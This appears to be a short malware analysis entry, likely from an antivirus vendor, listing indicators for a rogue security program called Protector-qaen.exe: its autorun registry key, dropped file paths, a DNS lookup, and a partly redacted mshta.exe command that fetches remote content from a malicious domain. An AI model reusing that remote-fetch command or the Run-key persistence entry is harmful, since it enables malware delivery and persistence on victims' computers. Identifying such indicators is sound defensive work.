Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Inspector' = '%APPDATA%\Protector-qaen.exe'
- '%APPDATA%\Protector-qaen.exe'
- '<SYSTEM32>\mshta.exe' "http://ga#####.#eleaseinfoupdate.pl/?0=##########################################################################################"
- %APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#local\settings.sol
- %APPDATA%\Protector-qaen.exe
- 'localhost':1035
- DNS ASK ga#####.#eleaseinfoupdate.pl
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'Indicator' WindowName: '(null)'